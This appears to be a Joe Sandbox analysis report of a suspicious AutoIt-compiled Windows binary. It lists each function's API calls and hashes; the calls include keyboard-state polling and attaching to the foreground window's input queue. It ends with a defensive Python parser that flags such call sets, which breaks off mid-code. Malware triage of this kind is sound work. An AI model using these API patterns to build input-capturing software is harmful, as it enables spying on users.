• Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
• Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
• SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
• VariantInit.OLEAUT32(?), ref: 004793E1
• SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
• VariantCopy.OLEAUT32(?,?), ref: 00479461
• SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
• VariantClear.OLEAUT32(?), ref: 00479489
• SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
• SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
• VariantClear.OLEAUT32(?), ref: 004794CA
• SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
• Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
• Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
• Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
• Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
APIs
• GetKeyboardState.USER32(?), ref: 0044480E
• GetAsyncKeyState.USER32(000000A0), ref: 00444899
• GetKeyState.USER32(000000A0), ref: 004448AA
• GetAsyncKeyState.USER32(000000A1), ref: 004448C8
• GetKeyState.USER32(000000A1), ref: 004448D9
• GetAsyncKeyState.USER32(00000011), ref: 004448F5
• GetKeyState.USER32(00000011), ref: 00444903
• GetAsyncKeyState.USER32(00000012), ref: 0044491F
• GetKeyState.USER32(00000012), ref: 0044492D
• GetAsyncKeyState.USER32(0000005B), ref: 00444949
• GetKeyState.USER32(0000005B), ref: 00444958
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
• Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
• Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
• Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 3413494760-0
                                                                                              • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                                              • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                                              • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                                              • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                                              • String ID: AU3_FreeVar
                                                                                              • API String ID: 2634073740-771828931
                                                                                              • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                                              • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                                              • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                                              • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                                                              APIs
                                                                                              • CoInitialize.OLE32 ref: 0046C63A
                                                                                              • CoUninitialize.OLE32 ref: 0046C645
                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                                                • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                                              • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                                              • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                                              • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                                              • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                              • API String ID: 2294789929-1287834457
                                                                                              • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                                              • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                                              • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                                              • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                                              APIs
                                                                                                • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                                                • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                              • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                                              • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                                              • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                                              • ReleaseCapture.USER32 ref: 0047116F
                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                              • API String ID: 2483343779-2107944366
                                                                                              • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                                              • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                                              • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                                              • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                                              • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                                              • _wcslen.LIBCMT ref: 00450720
                                                                                              • _wcscat.LIBCMT ref: 00450733
                                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                                              • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window_wcscat_wcslen
                                                                                              • String ID: -----$SysListView32
                                                                                              • API String ID: 4008455318-3975388722
                                                                                              • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                              • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                                              • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                              • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                                              APIs
                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                              • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                                              • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                                              • GetParent.USER32 ref: 00469C98
                                                                                              • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                                              • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                                              • GetParent.USER32 ref: 00469CBC
                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 2360848162-1403004172
                                                                                              • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                              • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                                              • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                              • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                                              • String ID:
                                                                                              • API String ID: 262282135-0
                                                                                              • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                              • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                                              • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                              • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                                              • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                                              • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                                              • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                                              • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                                              • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$LongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 312131281-0
                                                                                              • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                              • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                                              • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                              • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                                              APIs
                                                                                                • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                                              • SendMessageW.USER32(76C223D0,00001001,00000000,?), ref: 00448E16
                                                                                              • SendMessageW.USER32(76C223D0,00001026,00000000,?), ref: 00448E25
                                                                                                • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                              • String ID:
                                                                                              • API String ID: 3771399671-0
                                                                                              • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                              • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                                                              • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                              • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                                              • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                              • String ID:
                                                                                              • API String ID: 2156557900-0
                                                                                              • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                              • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                                              • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                              • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
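                                                                                              The list-view SendMessageW records further up and the GetCurrentThreadId / GetForegroundWindow / GetWindowThreadProcessId / AttachThreadInput record directly above are the kind of per-function listing an analyst has to skim across hundreds of functions in a report like this one. The parser below is an added example and is not part of the Joe Sandbox report or its tooling. It reads `APIs` lines in exactly the format printed on this page (including the `Part of subcall function` prefix and bare `ref:` lines without an argument list), names list-view window messages from their standard Windows `LVM_*` values (`LVM_FIRST = 0x1000`), and flags a function whose call set matches a small rule table. That rule table is this example's own assumption, not a detection from the report; its first rule is simply the call combination visible in the record above. The sample input is copied from this page's own listing.

```python
"""Parse the per-function "APIs" listings that Joe Sandbox prints under each
disassembled function and flag call sets worth a second look.

Added example for this report page, not Joe Sandbox code.  SAMPLE_LISTING is
copied from two function records on this page; LISTVIEW_MSGS holds standard
Windows LVM_* constants; FLAG_RULES is this example's own assumption."""
import re
from dataclasses import dataclass
from typing import Optional

# "• Api.MODULE(args), ref: ADDR"; calls made inside a callee are printed as
# "• Part of subcall function ADDR: Api.MODULE(args), ref: ADDR".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<subfn>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*?)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

@dataclass
class ApiCall:
    api: str
    module: str
    args: list                        # raw argument strings; "?" = unresolved
    ref: int                          # call-site address
    subcall_of: Optional[int] = None  # callee address for "Part of subcall"

def parse_listing(text: str) -> list:
    """Return one list of ApiCall per function.  An "APIs" header opens a
    record, "Memory Dump Source" closes it; every other line is ignored."""
    records, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = []
            records.append(current)
            continue
        if stripped == "Memory Dump Source":
            current = None
            continue
        m = API_LINE.match(line) if current is not None else None
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        current.append(ApiCall(
            api=m["api"], module=m["module"], args=args, ref=int(m["ref"], 16),
            subcall_of=int(m["subfn"], 16) if m["subfn"] else None))
    return records

LVM_FIRST = 0x1000
LISTVIEW_MSGS = {               # standard commctrl.h list-view messages
    LVM_FIRST + 1: "LVM_SETBKCOLOR",
    LVM_FIRST + 4: "LVM_GETITEMCOUNT",
    LVM_FIRST + 8: "LVM_DELETEITEM",
    LVM_FIRST + 31: "LVM_GETHEADER",
    LVM_FIRST + 38: "LVM_SETTEXTBKCOLOR",
    LVM_FIRST + 77: "LVM_INSERTITEMW",
    LVM_FIRST + 116: "LVM_SETITEMTEXTW",
}

def decode_message(call: ApiCall) -> Optional[str]:
    """Name the window message (second argument) of a SendMessage* call if it
    is a known list-view message.  An unresolved "?" in that slot, as in the
    shifted argument list at 004481AB on this page, yields None."""
    if not call.api.startswith("SendMessage") or len(call.args) < 2:
        return None
    try:
        return LISTVIEW_MSGS.get(int(call.args[1], 16))
    except ValueError:
        return None

# Assumed triage rules: every API in the set must occur in the same function.
FLAG_RULES = {
    "attaches to the foreground window's input queue":
        {"GetForegroundWindow", "GetWindowThreadProcessId", "AttachThreadInput"},
    "moves a file after resolving its full path":
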